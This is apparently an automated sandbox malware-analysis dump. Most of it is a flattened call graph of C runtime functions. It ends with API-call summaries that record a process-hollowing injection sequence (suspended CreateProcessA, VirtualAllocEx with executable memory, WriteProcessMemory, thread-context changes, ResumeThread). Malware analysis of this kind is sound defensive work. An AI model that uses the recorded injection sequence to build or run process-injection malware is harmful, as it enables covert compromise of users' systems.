15255->15256 15257 6e22a8 15255->15257 15258 6e2d2c _Deallocate 44 API calls 15256->15258 15259 6e701e 15257->15259 15258->15257 15260 6e7026 15259->15260 15261 6e7027 IsProcessorFeaturePresent 15259->15261 15260->15196 15263 6e784d 15261->15263 15571 6e7810 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15263->15571 15265 6e7930 15265->15196 15267 6e2b70 15266->15267 15270 6e2b16 std::_Throw_Cpp_error 15266->15270 15281 6e132e 15267->15281 15272 6e2b1d std::_Throw_Cpp_error 15270->15272 15273 6e3709 15270->15273 15272->15224 15274 6e371c 15273->15274 15275 6e3714 15273->15275 15277 6e3728 15274->15277 15279 6e7031 codecvt 45 API calls 15274->15279 15284 6e38f6 15275->15284 15277->15272 15278 6e371a 15278->15272 15280 6e3726 15279->15280 15280->15272 15509 6e3d97 15281->15509 15285 6e3905 15284->15285 15287 6e12bf Concurrency::cancel_current_task 15284->15287 15286 6e7031 codecvt 45 API calls 15285->15286 15288 6e390b 15286->15288 15298 6e8413 15287->15298 15289 6e3912 15288->15289 15304 6ec74e 15288->15304 15289->15278 15291 6e12db 15301 6e1235 15291->15301 15297 6ec82e 15299 6e845a RaiseException 15298->15299 15300 6e842d 15298->15300 15299->15291 15300->15299 15314 6e7deb 15301->15314 15305 6ec760 _Fputc 15304->15305 15367 6ec785 15305->15367 15307 6ec778 15378 6ec320 15307->15378 15310 6ec82f IsProcessorFeaturePresent 15311 6ec83b 15310->15311 15312 6ec606 __InternalCxxFrameHandler 8 API calls 15311->15312 15313 6ec850 GetCurrentProcess TerminateProcess 15312->15313 15313->15297 15315 6e7df8 ___std_exception_copy 15314->15315 15318 6e1256 15314->15318 15315->15318 15319 6e7e25 15315->15319 15320 6f1e05 15315->15320 15318->15278 15329 6eba1b 15319->15329 15321 6f1e21 15320->15321 15322 6f1e13 15320->15322 15332 6ec900 15321->15332 15322->15321 15327 6f1e39 15322->15327 15324 6f1e29 15335 6ec802 15324->15335 15326 6f1e33 15326->15319 15327->15326 15328 6ec900 __strnicoll 14 API calls 15327->15328 15328->15324 15361 6f1f6f 
15329->15361 15338 6f243a GetLastError 15332->15338 15334 6ec905 15334->15324 15336 6ec74e __strnicoll 44 API calls 15335->15336 15337 6ec80e 15336->15337 15337->15326 15339 6f2456 15338->15339 15340 6f2450 15338->15340 15342 6f2b05 __Getctype 6 API calls 15339->15342 15344 6f245a SetLastError 15339->15344 15341 6f2ac6 __Getctype 6 API calls 15340->15341 15341->15339 15343 6f2472 15342->15343 15343->15344 15346 6f1f12 __InternalCxxFrameHandler 12 API calls 15343->15346 15344->15334 15347 6f2487 15346->15347 15348 6f248f 15347->15348 15349 6f24a0 15347->15349 15350 6f2b05 __Getctype 6 API calls 15348->15350 15351 6f2b05 __Getctype 6 API calls 15349->15351 15352 6f249d 15350->15352 15353 6f24ac 15351->15353 15358 6f1f6f ___free_lconv_mon 12 API calls 15352->15358 15354 6f24c7 15353->15354 15355 6f24b0 15353->15355 15356 6f2117 __Getctype 12 API calls 15354->15356 15357 6f2b05 __Getctype 6 API calls 15355->15357 15359 6f24d2 15356->15359 15357->15352 15358->15344 15360 6f1f6f ___free_lconv_mon 12 API calls 15359->15360 15360->15344 15362 6f1f7a HeapFree 15361->15362 15366 6eba33 15361->15366 15363 6f1f8f GetLastError 15362->15363 15362->15366 15364 6f1f9c __dosmaperr 15363->15364 15365 6ec900 __strnicoll 12 API calls 15364->15365 15365->15366 15366->15318 15368 6ec795 15367->15368 15369 6ec79c 15367->15369 15384 6ec360 GetLastError 15368->15384 15375 6ec7aa 15369->15375 15388 6ec5dd 15369->15388 15372 6ec7d1 15373 6ec82f __Getctype 11 API calls 15372->15373 15372->15375 15374 6ec801 15373->15374 15376 6ec74e __strnicoll 44 API calls 15374->15376 15375->15307 15377 6ec80e 15376->15377 15377->15307 15379 6ec32c 15378->15379 15380 6ec343 15379->15380 15435 6ec3b0 15379->15435 15382 6ec356 15380->15382 15383 6ec3b0 _Fputc 44 API calls 15380->15383 15382->15310 15383->15382 15385 6ec379 15384->15385 15391 6f24eb 15385->15391 15389 6ec5e8 GetLastError SetLastError 15388->15389 15390 6ec601 15388->15390 15389->15372 15390->15372 15392 6f24fe 15391->15392 15393 6f2504 
15391->15393 15413 6f2ac6 15392->15413 15412 6ec395 SetLastError 15393->15412 15418 6f2b05 15393->15418 15399 6f254b 15402 6f2b05 __Getctype 6 API calls 15399->15402 15400 6f2536 15401 6f2b05 __Getctype 6 API calls 15400->15401 15404 6f2542 15401->15404 15403 6f2557 15402->15403 15405 6f255b 15403->15405 15406 6f256a 15403->15406 15408 6f1f6f ___free_lconv_mon 14 API calls 15404->15408 15409 6f2b05 __Getctype 6 API calls 15405->15409 15430 6f2117 15406->15430 15408->15412 15409->15404 15411 6f1f6f ___free_lconv_mon 14 API calls 15411->15412 15412->15369 15414 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 15413->15414 15415 6f2ae2 15414->15415 15416 6f2afd TlsGetValue 15415->15416 15417 6f2aeb 15415->15417 15417->15393 15419 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 15418->15419 15420 6f2b21 15419->15420 15421 6f2b3f TlsSetValue 15420->15421 15422 6f251e 15420->15422 15422->15412 15423 6f1f12 15422->15423 15429 6f1f1f __InternalCxxFrameHandler 15423->15429 15424 6f1f5f 15426 6ec900 __strnicoll 13 API calls 15424->15426 15425 6f1f4a RtlAllocateHeap 15427 6f1f5d 15425->15427 15425->15429 15426->15427 15427->15399 15427->15400 15428 6ef569 codecvt EnterCriticalSection LeaveCriticalSection 15428->15429 15429->15424 15429->15425 15429->15428 15431 6f1fa9 __Getctype EnterCriticalSection LeaveCriticalSection 15430->15431 15432 6f2185 15431->15432 15433 6f20bd __Getctype 14 API calls 15432->15433 15434 6f21ae 15433->15434 15434->15411 15436 6ec3be GetLastError 15435->15436 15437 6ec3ff 15435->15437 15438 6ec3cd 15436->15438 15437->15380 15439 6f24eb _Fputc 14 API calls 15438->15439 15440 6ec3ea SetLastError 15439->15440 15440->15437 15441 6ec406 15440->15441 15444 6ec9ca 15441->15444 15465 6f313a 15444->15465 15447 6ec9da 15449 6eca03 15447->15449 15450 6ec9e4 IsProcessorFeaturePresent 15447->15450 15501 6f0111 15449->15501 15452 6ec9f0 15450->15452 15495 6ec606 15452->15495 15455 6f1f12 __InternalCxxFrameHandler 14 API calls 15456 6eca35 15455->15456 
15457 6f1f6f ___free_lconv_mon 14 API calls 15456->15457 15458 6eca41 15457->15458 15459 6f1f12 __InternalCxxFrameHandler 14 API calls 15458->15459 15463 6eca67 15458->15463 15460 6eca5b 15459->15460 15462 6f1f6f ___free_lconv_mon 14 API calls 15460->15462 15462->15463 15464 6ec40b 15463->15464 15504 6f2bc2 15463->15504 15466 6f306c __InternalCxxFrameHandler EnterCriticalSection LeaveCriticalSection 15465->15466 15467 6ec9cf 15466->15467 15467->15447 15468 6f317f 15467->15468 15470 6f318b __FrameHandler3::FrameUnwindToState 15468->15470 15469 6f31b2 __InternalCxxFrameHandler 15472 6f31ff 15469->15472 15474 6f31b8 __InternalCxxFrameHandler 15469->15474 15494 6f31e9 15469->15494 15470->15469 15471 6f243a __dosmaperr 14 API calls 15470->15471 15470->15474 15471->15469 15473 6ec900 __strnicoll 14 API calls 15472->15473 15475 6f3204 15473->15475 15477 6f322b 15474->15477 15478 6ec954 std::_Lockit::_Lockit EnterCriticalSection 15474->15478 15476 6ec802 __strnicoll 44 API calls 15475->15476 15476->15494 15480 6f335e 15477->15480 15481 6f326d 15477->15481 15491 6f329c 15477->15491 15478->15477 15479 6f330b __InternalCxxFrameHandler LeaveCriticalSection 15483 6f32e2 15479->15483 15482 6f3369 15480->15482 15484 6ec99c std::_Lockit::~_Lockit LeaveCriticalSection 15480->15484 15486 6f22e9 __Getctype 44 API calls 15481->15486 15481->15491 15485 6f0111 __InternalCxxFrameHandler 23 API calls 15482->15485 15488 6f22e9 __Getctype 44 API calls 15483->15488 15492 6f32f1 15483->15492 15483->15494 15484->15482 15487 6f3371 15485->15487 15489 6f3291 15486->15489 15488->15492 15490 6f22e9 __Getctype 44 API calls 15489->15490 15490->15491 15491->15479 15493 6f22e9 __Getctype 44 API calls 15492->15493 15492->15494 15493->15494 15494->15447 15496 6ec622 __InternalCxxFrameHandler __fread_nolock 15495->15496 15497 6ec64e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15496->15497 15499 6ec71f __InternalCxxFrameHandler 15497->15499 15498 6e701e 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15500 6ec73d 15498->15500 15499->15498 15500->15449 15502 6eff35 __InternalCxxFrameHandler 23 API calls 15501->15502 15503 6eca0d 15502->15503 15503->15455 15505 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 15504->15505 15506 6f2bde 15505->15506 15507 6f2bfc InitializeCriticalSectionAndSpinCount 15506->15507 15508 6f2be7 15506->15508 15507->15508 15508->15463 15514 6e3cd7 15509->15514 15512 6e8413 CallUnexpected RaiseException 15513 6e3db6 15512->15513 15517 6e1200 15514->15517 15518 6e7deb ___std_exception_copy 44 API calls 15517->15518 15519 6e122c 15518->15519 15519->15512 15523 6ef596 15520->15523 15524 6ef5a2 __FrameHandler3::FrameUnwindToState 15523->15524 15529 6ec954 EnterCriticalSection 15524->15529 15526 6ef5ad 15530 6ef5e9 15526->15530 15529->15526 15533 6ec99c LeaveCriticalSection 15530->15533 15532 6ef574 15532->15226 15533->15532 15535 6e2114 15534->15535 15536 6e2431 15534->15536 15535->15243 15538 6e2d2c 15536->15538 15539 6e2d46 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15538->15539 15540 6e2d39 15538->15540 15539->15535 15542 6e130c 15540->15542 15543 6e1329 15542->15543 15544 6e1326 15542->15544 15545 6ec74e __strnicoll 44 API calls 15543->15545 15544->15539 15546 6ec821 15545->15546 15547 6ec82f __Getctype 11 API calls 15546->15547 15548 6ec82e 15547->15548 15550 6e35f6 __EH_prolog3_catch 15549->15550 15551 6e36f9 15550->15551 15552 6e3613 15550->15552 15562 6e384b 15551->15562 15554 6e3630 15552->15554 15555 6e36fe 15552->15555 15556 6e3709 std::_Throw_Cpp_error 45 API calls 15554->15556 15565 6e12bf 15555->15565 15559 6e3646 ctype 15556->15559 15560 6e2d2c _Deallocate 44 API calls 15559->15560 15561 6e36c5 codecvt 15559->15561 15560->15561 15561->15250 15563 6e3d97 std::_Xinvalid_argument 45 API calls 15562->15563 15564 6e3855 15563->15564 15566 6e12cd Concurrency::cancel_current_task 15565->15566 15567 6e8413 CallUnexpected RaiseException 15566->15567 15568 6e12db 
15567->15568 15569 6e1235 Concurrency::cancel_current_task 44 API calls 15568->15569 15570 6e12e8 15569->15570 15571->15265 15573 6e33ac __EH_prolog3_catch 15572->15573 15596 6e3074 15573->15596 15575 6e33f5 15580 6e33fa 15575->15580 15600 6e4eb0 15575->15600 15577 6e351c 15613 6e2de0 15577->15613 15579 6e3524 codecvt 15579->15199 15604 6e1caf 15580->15604 15827 6e35ab 15582->15827 15584 6e245d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15584->15210 15586 6e373d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15585->15586 15587 6e3735 15585->15587 15586->15199 15588 6e2520 std::_Throw_Cpp_error 44 API calls 15587->15588 15588->15586 15590 6e3d97 std::_Xinvalid_argument 45 API calls 15589->15590 15591 6e1d3b 15590->15591 15592 6e35ea 45 API calls 15591->15592 15593 6e1dc5 15591->15593 15592->15591 15594 6e1dd8 15593->15594 15595 6e2d2c _Deallocate 44 API calls 15593->15595 15595->15594 15598 6e308c 15596->15598 15597 6e30af 15597->15575 15598->15597 15617 6e2e67 15598->15617 15601 6e4ed2 ctype 15600->15601 15603 6e4ebf 15600->15603 15601->15603 15625 6edcd3 15601->15625 15603->15580 15605 6e1d0a 15604->15605 15607 6e1cc6 std::ios_base::_Init 15604->15607 15605->15577 15606 6e8413 CallUnexpected RaiseException 15608 6e1d18 15606->15608 15612 6e1cff 15607->15612 15757 6e1c86 15607->15757 15760 6e157e 15608->15760 15612->15606 15614 6e2de8 15613->15614 15615 6e2df3 15614->15615 15823 6e3338 15614->15823 15615->15579 15618 6e2e73 __EH_prolog3_catch 15617->15618 15619 6e2f18 codecvt 15618->15619 15620 6e3074 45 API calls 15618->15620 15619->15597 15623 6e2e92 15620->15623 15621 6e2f10 15622 6e2de0 45 API calls 15621->15622 15622->15619 15623->15621 15624 6e1caf std::ios_base::_Init 45 API calls 15623->15624 15624->15621 15626 6edce6 _Fputc 15625->15626 15631 6edab2 15626->15631 15628 6edcfb 15629 6ec320 _Fputc 44 API calls 15628->15629 15630 6edd08 15629->15630 15630->15603 15632 6edac0 15631->15632 15637 6edae8 15631->15637 15633 6edaef 15632->15633 15634 6edacd 15632->15634 
15632->15637 15639 6eda0b 15633->15639 15635 6ec785 __strnicoll 44 API calls 15634->15635 15635->15637 15637->15628 15640 6eda17 __FrameHandler3::FrameUnwindToState 15639->15640 15647 6ecb78 EnterCriticalSection 15640->15647 15642 6eda25 15648 6eda66 15642->15648 15647->15642 15658 6f5e44 15648->15658 15655 6eda5a 15756 6ecb8c LeaveCriticalSection 15655->15756 15657 6eda43 15657->15628 15678 6f5e09 15658->15678 15660 6eda7e 15665 6edb29 15660->15665 15661 6f5e55 15661->15660 15684 6f5f8a 15661->15684 15664 6f1f6f ___free_lconv_mon 14 API calls 15664->15660 15667 6edb3b 15665->15667 15669 6eda9c 15665->15669 15666 6edb49 15668 6ec785 __strnicoll 44 API calls 15666->15668 15667->15666 15667->15669 15672 6edb7f ctype _Fputc 15667->15672 15668->15669 15674 6f5ef0 15669->15674 15671 6f364f _Ungetc 44 API calls 15671->15672 15672->15669 15672->15671 15707 6ecf32 15672->15707 15713 6f4152 15672->15713 15675 6eda32 15674->15675 15676 6f5efb 15674->15676 15675->15655 15676->15675 15677 6ecf32 ___scrt_uninitialize_crt 69 API calls 15676->15677 15677->15675 15680 6f5e15 15678->15680 15679 6f5e36 15679->15661 15680->15679 15691 6f364f 15680->15691 15682 6f5e30 15698 6fbe7c 15682->15698 15685 6f5fc8 15684->15685 15690 6f5f98 __InternalCxxFrameHandler 15684->15690 15687 6ec900 __strnicoll 14 API calls 15685->15687 15686 6f5fb3 RtlAllocateHeap 15688 6f5eaf 15686->15688 15686->15690 15687->15688 15688->15664 15689 6ef569 codecvt 2 API calls 15689->15690 15690->15685 15690->15686 15690->15689 15692 6f365b 15691->15692 15693 6f3670 15691->15693 15694 6ec900 __strnicoll 14 API calls 15692->15694 15693->15682 15695 6f3660 15694->15695 15696 6ec802 __strnicoll 44 API calls 15695->15696 15697 6f366b 15696->15697 15697->15682 15699 6fbe89 15698->15699 15700 6fbe96 15698->15700 15701 6ec900 __strnicoll 14 API calls 15699->15701 15702 6fbea2 15700->15702 15703 6ec900 __strnicoll 14 API calls 15700->15703 15704 6fbe8e 15701->15704 15702->15679 15705 6fbec3 15703->15705 15704->15679 15706 
6ec802 __strnicoll 44 API calls 15705->15706 15706->15704 15708 6ecf4b 15707->15708 15712 6ecf72 15707->15712 15709 6f364f _Ungetc 44 API calls 15708->15709 15708->15712 15710 6ecf67 15709->15710 15711 6f4152 ___scrt_uninitialize_crt 69 API calls 15710->15711 15711->15712 15712->15672 15714 6f415e __FrameHandler3::FrameUnwindToState 15713->15714 15715 6f4222 15714->15715 15717 6f41b3 15714->15717 15723 6f4166 15714->15723 15716 6ec785 __strnicoll 44 API calls 15715->15716 15716->15723 15724 6f93ca EnterCriticalSection 15717->15724 15719 6f41b9 15720 6f41d6 15719->15720 15725 6f425a 15719->15725 15753 6f421a 15720->15753 15723->15672 15724->15719 15726 6f427f 15725->15726 15749 6f42a2 __fread_nolock 15725->15749 15727 6f4283 15726->15727 15729 6f42e1 15726->15729 15728 6ec785 __strnicoll 44 API calls 15727->15728 15728->15749 15730 6f42f8 15729->15730 15731 6f5deb ___scrt_uninitialize_crt 46 API calls 15729->15731 15732 6f3dde ___scrt_uninitialize_crt 45 API calls 15730->15732 15731->15730 15733 6f4302 15732->15733 15734 6f4348 15733->15734 15735 6f4308 15733->15735 15737 6f435c 15734->15737 15738 6f43ab WriteFile 15734->15738 15736 6f4332 15735->15736 15739 6f430f 15735->15739 15740 6f39a4 ___scrt_uninitialize_crt 50 API calls 15736->15740 15742 6f4399 15737->15742 15743 6f4364 15737->15743 15741 6f43cd GetLastError 15738->15741 15751 6f4343 15738->15751 15744 6f3d76 ___scrt_uninitialize_crt 6 API calls 15739->15744 15739->15749 15740->15751 15741->15751 15745 6f3e5c ___scrt_uninitialize_crt 7 API calls 15742->15745 15746 6f4369 15743->15746 15747 6f4387 15743->15747 15744->15749 15745->15749 15746->15749 15750 6f4372 15746->15750 15748 6f4020 ___scrt_uninitialize_crt 8 API calls 15747->15748 15748->15751 15749->15720 15752 6f3f37 ___scrt_uninitialize_crt 7 API calls 15750->15752 15751->15749 15752->15749 15754 6f93ed ___scrt_uninitialize_crt LeaveCriticalSection 15753->15754 15755 6f4220 15754->15755 15755->15723 15756->15657 15763 6e150d 15757->15763 15761 6e1235 
Concurrency::cancel_current_task 44 API calls 15760->15761 15762 6e158c 15761->15762 15762->15577 15764 6e2493 std::_Throw_Cpp_error 45 API calls 15763->15764 15765 6e1531 15764->15765 15772 6e147d 15765->15772 15768 6e2520 std::_Throw_Cpp_error 44 API calls 15769 6e154c 15768->15769 15770 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15769->15770 15771 6e1560 15770->15771 15771->15612 15783 6e24ec 15772->15783 15779 6e2520 std::_Throw_Cpp_error 44 API calls 15780 6e14c0 15779->15780 15781 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15780->15781 15782 6e14df 15781->15782 15782->15768 15784 6e250c 15783->15784 15803 6e2b76 15784->15803 15786 6e149e 15787 6e13fb 15786->15787 15788 6e142c 15787->15788 15789 6e1416 std::_Throw_Cpp_error 15787->15789 15791 6e2581 std::_Throw_Cpp_error 45 API calls 15788->15791 15810 6e2581 15789->15810 15792 6e1452 15791->15792 15793 6e2520 std::_Throw_Cpp_error 44 API calls 15792->15793 15794 6e145a std::_Throw_Cpp_error 15793->15794 15795 6e2520 std::_Throw_Cpp_error 44 API calls 15794->15795 15796 6e146d 15795->15796 15797 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15796->15797 15798 6e147b 15797->15798 15799 6e1339 15798->15799 15800 6e1346 15799->15800 15801 6e1200 std::exception::exception 44 API calls 15800->15801 15802 6e134e 15801->15802 15802->15779 15804 6e2bd8 15803->15804 15807 6e2b87 std::_Throw_Cpp_error 15803->15807 15805 6e132e std::_Throw_Cpp_error 45 API calls 15804->15805 15806 6e2bdd 15805->15806 15808 6e3709 std::_Throw_Cpp_error 45 API calls 15807->15808 15809 6e2b8e std::_Throw_Cpp_error ctype 15807->15809 15808->15809 15809->15786 15811 6e25c1 15810->15811 15813 6e2597 std::_Throw_Cpp_error 15810->15813 15814 6e2c78 15811->15814 15813->15788 15815 6e2d26 15814->15815 15816 6e2c95 std::_Throw_Cpp_error 15814->15816 15817 6e132e std::_Throw_Cpp_error 45 API calls 15815->15817 15819 6e3709 std::_Throw_Cpp_error 45 API calls 
15816->15819 15818 6e2d2b 15817->15818 15820 6e2cb4 std::_Throw_Cpp_error 15819->15820 15821 6e2d2c _Deallocate 44 API calls 15820->15821 15822 6e2cf4 std::_Throw_Cpp_error 15820->15822 15821->15822 15822->15813 15824 6e3344 __EH_prolog3_catch 15823->15824 15825 6e3380 codecvt 15824->15825 15826 6e1caf std::ios_base::_Init 45 API calls 15824->15826 15825->15615 15826->15825 15828 6e35b9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15827->15828 15831 6e35e4 15827->15831 15829 6e35ab 44 API calls 15828->15829 15830 6e2520 std::_Throw_Cpp_error 44 API calls 15828->15830 15828->15831 15829->15828 15830->15828 15831->15584 15842 6e6b6e EnterCriticalSection 15832->15842 15834 6e3b58 15834->15218 15836 6e6fb3 ReleaseSRWLockExclusive 15835->15836 15837 6e6fc1 15835->15837 15836->15837 15837->15218 15838->15218 15843 6e6b7c LeaveCriticalSection 15839->15843 15841 6e3b64 15841->15178 15842->15834 15843->15841 20553 6eded1 20554 6edee4 _Fputc 20553->20554 20559 6ede08 20554->20559 20556 6edef9 20557 6ec320 _Fputc 44 API calls 20556->20557 20558 6edf06 20557->20558 20560 6ede1a 20559->20560 20562 6ede3d 20559->20562 20561 6ec785 __strnicoll 44 API calls 20560->20561 20563 6ede35 20561->20563 20562->20560 20564 6ede64 20562->20564 20563->20556 20567 6edd0d 20564->20567 20568 6edd19 __FrameHandler3::FrameUnwindToState 20567->20568 20575 6ecb78 EnterCriticalSection 20568->20575 20570 6edd27 20576 6edd68 20570->20576 20572 6edd34 20585 6edd5c 20572->20585 20575->20570 20577 6ecf32 ___scrt_uninitialize_crt 69 API calls 20576->20577 20578 6edd83 20577->20578 20579 6f341d 14 API calls 20578->20579 20580 6edd8d 20579->20580 20581 6f1f12 __InternalCxxFrameHandler 14 API calls 20580->20581 20583 6edda8 20580->20583 20582 6eddcc 20581->20582 20584 6f1f6f ___free_lconv_mon 14 API calls 20582->20584 20583->20572 20584->20583 20588 6ecb8c LeaveCriticalSection 20585->20588 20587 6edd45 20587->20556 20588->20587 17240 6e4c85 17241 6e4c91 17240->17241 17242 6e4c9c 17241->17242 17245 6e4b19 
17241->17245 17250 6e3df7 17245->17250 17248 6e7548 std::_Throw_Cpp_error 5 API calls 17249 6e4c51 17248->17249 17253 6ed0a5 17250->17253 17252 6e3e02 17252->17248 17254 6ed0b1 __FrameHandler3::FrameUnwindToState 17253->17254 17255 6ed0bb 17254->17255 17256 6ed0d3 17254->17256 17257 6ec900 __strnicoll 14 API calls 17255->17257 17273 6ecb78 EnterCriticalSection 17256->17273 17259 6ed0c0 17257->17259 17261 6ec802 __strnicoll 44 API calls 17259->17261 17260 6ed0dd 17262 6ed179 17260->17262 17263 6f364f _Ungetc 44 API calls 17260->17263 17267 6ed0cb _Fputc 17261->17267 17274 6ed05e 17262->17274 17269 6ed0fa 17263->17269 17265 6ed17f 17281 6ed1a9 17265->17281 17267->17252 17268 6ed151 17270 6ec900 __strnicoll 14 API calls 17268->17270 17269->17262 17269->17268 17271 6ed156 17270->17271 17272 6ec802 __strnicoll 44 API calls 17271->17272 17272->17267 17273->17260 17275 6ed06a 17274->17275 17278 6ed07f __fread_nolock 17274->17278 17276 6ec900 __strnicoll 14 API calls 17275->17276 17277 6ed06f 17276->17277 17279 6ec802 __strnicoll 44 API calls 17277->17279 17278->17265 17280 6ed07a 17279->17280 17280->17265 17284 6ecb8c LeaveCriticalSection 17281->17284 17283 6ed1af 17283->17267 17284->17283 18535 6e614c 18537 6e6158 __EH_prolog3_GS 18535->18537 18536 6e616f 18538 6e7548 std::_Throw_Cpp_error 5 API calls 18536->18538 18537->18536 18539 6e61a7 18537->18539 18546 6e61c1 18537->18546 18540 6e628b 18538->18540 18549 6e54ff 18539->18549 18542 6ed0a5 46 API calls 18542->18546 18543 6e2546 45 API calls 18543->18546 18544 6e2520 std::_Throw_Cpp_error 44 API calls 18544->18536 18545 6e6270 18545->18544 18546->18542 18546->18543 18546->18545 18548 6e62ab 18546->18548 18547 6ee004 46 API calls 18547->18548 18548->18545 18548->18547 18552 6ee47f 18549->18552 18553 6ee48b __FrameHandler3::FrameUnwindToState 18552->18553 18554 6ee4a9 18553->18554 18555 6ee492 18553->18555 18565 6ecb78 EnterCriticalSection 18554->18565 18556 6ec900 __strnicoll 14 API calls 18555->18556 18558 6ee497 
18556->18558 18560 6ec802 __strnicoll 44 API calls 18558->18560 18559 6ee4b5 18566 6ee30f 18559->18566 18562 6e550a 18560->18562 18562->18536 18563 6ee4c0 18593 6ee4ee 18563->18593 18565->18559 18567 6ee32c 18566->18567 18569 6ee355 18566->18569 18568 6f364f _Ungetc 44 API calls 18567->18568 18570 6ee332 18568->18570 18571 6f364f _Ungetc 44 API calls 18569->18571 18592 6ee370 18569->18592 18570->18569 18573 6f364f _Ungetc 44 API calls 18570->18573 18572 6ee3a7 18571->18572 18574 6f364f _Ungetc 44 API calls 18572->18574 18578 6ee3ca 18572->18578 18575 6ee33e 18573->18575 18576 6ee3b3 18574->18576 18575->18569 18577 6f364f _Ungetc 44 API calls 18575->18577 18576->18578 18580 6f364f _Ungetc 44 API calls 18576->18580 18579 6ee34a 18577->18579 18581 6ee9e2 __Getctype 44 API calls 18578->18581 18578->18592 18582 6f364f _Ungetc 44 API calls 18579->18582 18583 6ee3bf 18580->18583 18587 6ee402 18581->18587 18582->18569 18584 6f364f _Ungetc 44 API calls 18583->18584 18584->18578 18585 6ee42c 18596 6f67b6 18585->18596 18587->18585 18589 6ee419 18587->18589 18591 6ee004 46 API calls 18589->18591 18590 6ec900 __strnicoll 14 API calls 18590->18592 18591->18592 18592->18563 18636 6ecb8c LeaveCriticalSection 18593->18636 18595 6ee4f4 18595->18562 18597 6f67c9 _Fputc 18596->18597 18602 6f6683 18597->18602 18600 6ec320 _Fputc 44 API calls 18601 6ee440 18600->18601 18601->18590 18601->18592 18604 6f6697 18602->18604 18612 6f66a7 18602->18612 18603 6f66cc 18606 6f66dd 18603->18606 18607 6f6700 18603->18607 18604->18603 18604->18612 18614 6ec470 18604->18614 18621 6fbefe 18606->18621 18609 6f677c 18607->18609 18610 6f6728 18607->18610 18607->18612 18611 6f7a26 __fread_nolock MultiByteToWideChar 18609->18611 18610->18612 18613 6f7a26 __fread_nolock MultiByteToWideChar 18610->18613 18611->18612 18612->18600 18613->18612 18615 6ec3b0 _Fputc 44 API calls 18614->18615 18616 6ec480 18615->18616 18624 6f2fdd 18616->18624 18632 6fd042 18621->18632 18625 6ec49d 18624->18625 18626 6f2ff4 

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02CD02FC
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02CD030F
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02CD032D
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CD0351
• VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02CD037C
• TerminateProcess.KERNELBASE(?,00000000), ref: 02CD039B
• WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02CD03D4
• WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02CD041F
• WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CD045D
• Wow64SetThreadContext.KERNEL32(?,?), ref: 02CD0499
• ResumeThread.KERNELBASE(?), ref: 02CD04A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1590000008.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cd0000_file.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
• String ID: GetP$Load$aryA$ress
• API String ID: 2440066154-977067982
• Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
• Instruction ID: b5451e71f7702291b1172a6c7d96f1d144bde60052cc35317a0d7a6ee67fb83b
                                                                                    • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                    • Instruction Fuzzy Hash: 06B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • FreeConsole.KERNELBASE ref: 006E2303
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 006E2313
                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 006E241E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleCpp_errorCurrentFreeThreadThrow_std::_
                                                                                    • String ID:
                                                                                    • API String ID: 1679527187-0
                                                                                    • Opcode ID: ed77de1eb44fe322a5fe8b2e74c1133f56c3a282f1a3db86a999c0fb96a72b49
                                                                                    • Instruction ID: 0dd0707f57b667796694686b803073a6200886b3db127f6bdf9b9719bd99e688
                                                                                    • Opcode Fuzzy Hash: ed77de1eb44fe322a5fe8b2e74c1133f56c3a282f1a3db86a999c0fb96a72b49
                                                                                    • Instruction Fuzzy Hash: 7A41B0B1509382AFD300DF26DC91A5FB7EFEB88300F00492EF19496181EB74C9488B97
                                                                                    Memory Dump Source
